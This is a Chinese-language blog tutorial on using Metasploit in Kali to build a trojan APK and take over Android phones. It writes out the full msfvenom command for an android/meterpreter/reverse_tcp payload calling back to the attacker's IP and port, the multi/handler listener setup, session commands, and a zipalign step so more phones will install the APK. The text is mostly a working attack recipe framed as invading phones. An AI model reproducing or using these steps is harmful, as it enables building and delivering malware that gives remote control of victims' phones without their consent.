標籤:bsp data 安全性 http 開源 ever 本地 hack 模組
Metasploit是一款開源的安全性漏洞偵查工具,可以協助安全和IT專業人士識別安全性問題,驗證漏洞的緩解措施,並管理專家驅動的安全性進行評估,提供真正的安全風險情報。這些功能包括智能開發,代碼審計,Web應用程式掃描,社交工程。團隊合作,在Metasploit和綜合報告提出了他們的發現。
環境準備:
Kali2.0(msfVENOM、metasploit)
安卓手機或安卓模擬器
利用過程:
先查看本地IP地址
使用msfvenom產生apk木馬
1 |
msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.105.184 LPORT=5555 R > /root/apk.apk |
注釋:
LHOST = 接收反彈串連主機
LPORT = 接收反彈串連主機的監聽連接埠
172.16.105.184修改為本地的IP地址 5555是產生的連接埠號碼/root/apk.apk是產生的APK路徑
如顯示所示說明產生成功!
啟動msfconsole
輸入命令:
然後執行以下命令
123 |
use exploit/multi/handler //載入模組set payload android/meterpreter/reverse_tcp //選擇Payloadshow options //查看參數設定 |
這個payload裡邊有兩個參數要設定
LHOST和LPORT 表示地址和連接埠 預設的連接埠是4444 現在我們來更改設定
123 |
set LHOST 172.16.105.184 //這裡的地址設定成我們剛才產生木馬的IP地址 set LPORT 5555 //這裡的連接埠設定成剛才我們產生木馬所監聽的連接埠 |
配置完成後我們可以執行
1 |
show options //查看是否配置成功 |
最後我們把產生後的APK檔案安裝到模擬器或者手機中然後執行
1 |
exploit //開始執行漏洞 開始監聽,等待手機上線 |
我們可以發現有一個ID與本機處於串連狀態,現在我們可以執行
12 |
sessions //查看串連狀態sessions 1 //建立與ID值位1的主機串連 |
現在我們可以執行
更多命令參數可以使用help命令查看
PS:如果在操作過程中有什麼不懂的或遇到什麼問題可以在文章下方留言小殘看到後悔第一時間為大家解答
如果遇到部分手機會無法安裝產生後發APK檔案那麼我們可以zipalign工具最佳化處理
1 |
zipalign -v 4 apk.apk napk1.apk |
標籤:漏洞
Kali環境使用Metasploit產生木馬入侵安卓手機